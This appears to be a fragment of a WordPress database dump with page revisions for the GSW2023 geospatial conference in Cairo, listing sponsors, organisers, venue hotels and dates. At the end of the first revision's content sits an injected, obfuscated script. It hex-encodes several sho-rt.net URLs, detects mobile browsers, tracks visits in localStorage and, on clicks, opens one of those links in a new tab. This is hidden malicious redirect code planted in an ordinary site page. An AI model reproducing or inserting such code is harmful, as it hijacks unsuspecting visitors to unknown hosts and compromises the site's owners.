tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:22:40','2023-06-09 14:22:40','',3066,'https://gsw2023.com/?p=4647',0,'revision','',0),
(4648,1,'2023-06-09 14:24:09','2023-06-09 14:24:09','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" 